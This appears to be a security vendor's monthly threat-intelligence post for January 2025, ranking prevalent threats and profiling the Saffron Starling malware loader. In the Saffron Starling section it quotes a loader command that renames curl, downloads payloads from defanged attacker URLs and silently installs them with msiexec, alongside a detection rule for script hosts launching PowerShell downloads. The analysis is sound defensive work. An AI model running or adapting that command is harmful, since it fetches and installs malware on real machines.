Highlights from January
Making its debut at number 1 on our top 10 most prevalent threat list this month is Infrared Ibis, Red Canary’s name for a cluster of compromised Chrome extensions containing malicious code designed to steal cookies. In December 2024, Cyberhaven disclosed a compromise of version 24.10.4 of their Chrome extension. Following the initial disclosure, researchers quickly uncovered several additional Chrome extensions similarly compromised with the same malicious code, dating as far back as May 2024. Red Canary tracks activity related to these Chrome extensions under the name “Infrared Ibis.”
Our other newcomer to the top 10 is Saffron Starling, tied for 8th with NetSupport Manager. Saffron Starling is Red Canary’s name for a cluster of activity that downloads and delivers malicious payloads like Danabot, Darkgate, and Matanbuchus. We first started tracking it in October 2023, and since that time it has been consistently active, albeit at low enough levels to keep it out of the top 10 until January 2025. This recent increase in activity comes after a four-month hiatus that began in August 2024. You can read more about Saffron Starling below.
A note on ChromeLoader
Part of the intel team’s work is continually researching the threats we see, and sometimes that research leads to reassessments. In June 2024, we saw activity that we decided was best tracked as a new ChromeLoader campaign, based on overlaps with public reporting at the time. That decision kicked off ChromeLoader’s recent six-month stint at number 1 on our list.
However, after additional research and file analysis, we now assess this activity is better tracked as a variation of Browser Assistant. You can read more about this change in our assessment below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for January 2025:
| Month's rank | Threat name | Threat description |
|---|---|---|
| Month's rank: ⬆ 1 | Threat name: Infrared Ibis | Threat description : Red Canary's name for a cluster of compromised Chrome extensions containing malicious code designed to steal cookies |
| Month's rank: ➡ 2 | Threat name: | Threat description : Collection of Python classes to construct/manipulate network protocols |
| Month's rank: ⬆ 3 | Threat name: | Threat description : Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads |
| Month's rank: ⬇ 4* | Threat name: | Threat description : Red Canary's name for a cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities |
| Month's rank: ⬆ 4* | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
| Month's rank: ⬆ 4* | Threat name: | Threat description : Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
| Month's rank: ⬆ 7 | Threat name: | Threat description : Open source tool that dumps credentials using various techniques |
| Month's rank: ⬇ 8* | Threat name: | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
| Month's rank: ⬆ 8* | Threat name: Saffron Starling | Threat description : Cluster of activity that downloads additional malicious payloads such as Danabot and DarkGate |
| Month's rank: ⬆ 10* | Threat name: | Threat description : Red Canary's name for a suspected pay-per-install (PPI) provider that uses malvertising to deliver installers, often disguised as cracked games, fonts, or desktop wallpaper |
| Month's rank: ⬆ 10* | Threat name: | Threat description : Malware loader that uses DLL side-loading to deliver additional payloads through process injection |
| Month's rank: ⬇ 10* | Threat name: | Threat description : Penetration testing framework used to probe systematic vulnerabilities on networks and servers to conduct post-exploitation activity on compromised hosts |
| Month's rank: ⬇ 10* | Threat name: | Threat description : Malware family capable of a range of behaviors, including DLL side-loading, capturing the screen, and keylogging |
| Month's rank: ⬆ 10* | Threat name: | Threat description : Red Canary's name for an activity cluster using a worm spread by external drives that leverages Windows Installer to download malicious files |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
Scripting Saffron Starling
In September 2023, Red Canary observed a loader that we (and others) had up to that point referred to as the Danabot loader delivering a new payload, DarkGate. That change led us to track the loader as its own distinct threat that we named Saffron Starling. We weren’t the only team who noticed the activity in late 2023, as seen in reports from different researchers. In December 2023, Mandiant published a report sharing details of activity dropping Danabot and DarkGate that they called PAPERDROP/PAPERTEAR that has significant overlaps with the VBScript version of Saffron Starling.
Key features of Saffron Starling include:
- A .zip archive containing a script file like .vbs or .js
- Windows Scripting Host (
wscript.exe) executing that script with a command like:
"Wscript.exe" "C:\Users\username\Downloads\q-report-60033.zip\q-report-60033.js"
- The script file contents vary depending on the type of script being used, but will typically be obfuscated in some way.
- That script launches
cmd.exeor PowerShell to execute a command that reaches out to a remote resource to pull down the next stage payload.
Here is an example similar to what we’ve seen, from the VT sample .js file linked above:
"C:\Windows\System32\cmd.exe" /c cd /d "C:\Users\user\AppData\Local\Temp\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\Users\user\Documents\QMQjaBdqIo.pdf" hxxps://bologna.sunproject[.]dev/download/pdf & "C:\Users\user\Documents\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://rome.sunproject[.]dev/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qnObserved payloads so far at Red Canary include Danabot, DarkGate, and Matanbuchus.
There are several benefits of tracking Saffron Starling as a separate threat from its payload. At Red Canary we frequently detect malicious activity early enough in its execution chain that we don’t necessarily see the payload. Tracking the loader allows us to monitor its activity even without payload execution or as the payload changes. Additionally, it helps us determine which behaviors are earliest in that execution chain, leading to better detection coverage of the threat. For example, Saffron Starling uses PowerShell to download and execute its payloads, which gives us a detection opportunity before payload execution.
Detection opportunity: Script launching PowerShell to download and execute a payload
The following pseudo-detection analytic will identify wscript, cscript, or mshta launching PowerShell to download and execute a payload. Threats like Saffron Starling abuse this cmdlet to download and launch malicious code. Note that this cmdlet can be used legitimately for maintenance tasks and device administration, so you may need to investigate further to determine if the activity is evil. Childprocs and filemods to suspicious directories can be signs of successful payload execution.
parent_process == wscript.exe, cscript.exe, mshta.exe)
&&
process == (cmd.exe, powershell.exe)
&&
command_includes (“invoke_webrequest”)
Reassessing ChromeLoader detections
The Red Canary Intel team has recently reassessed how we track activity we previously labeled as ChromeLoader. In June 2024, Red Canary and third-party researchers observed activity that bore similarities to ChromeLoader, but was not quite the same. We chose at that time to track the activity as ChromeLoader, even as we began to wrestle with the possibility that it might be better tracked as something else.
At the end of the year, with ChromeLoader poised to be our number one threat for 2024, we dug in again to see what we could learn. The result of that research and analysis led us to the conclusion that what we tracked as a new ChromeLoader campaign was better tracked as a new variation of Browser Assistant.
Browser Assistant is a browser extension file offered by Realistic Media that claims to improve browser performance for Firefox and Chrome. It is frequently referred to as adware and/or a potentially unwanted program (PUP). While it’s considered to be “just” adware, the 2024 activity has several distinct differences when compared to traditional Browser Assistant:
- It attempts to masquerade as a PDF-themed download
- It installs itself in suspiciously named directories
- Occasionally it has a signing certificate that is registered to a different organization than the traditional “Realistic Media”
Even with these differences, we assess with high confidence that it has enough similarities to Browser Assistant to still categorize it as such, including:
- The same file structure
- The same obfuscator
- Signing certificate overlaps with traditional Browser Assistant
Because Browser Assistant has been historically categorized as a PUP, it currently does not meet our threshold for inclusion in this top 10 list. PUPs tend to be vastly more prevalent and are typically lower risk than more malicious types of threats, which is why Browser Assistant and others are not represented in this ranking.
Related Articles
Tangerine Turkey mines cryptocurrency in global campaign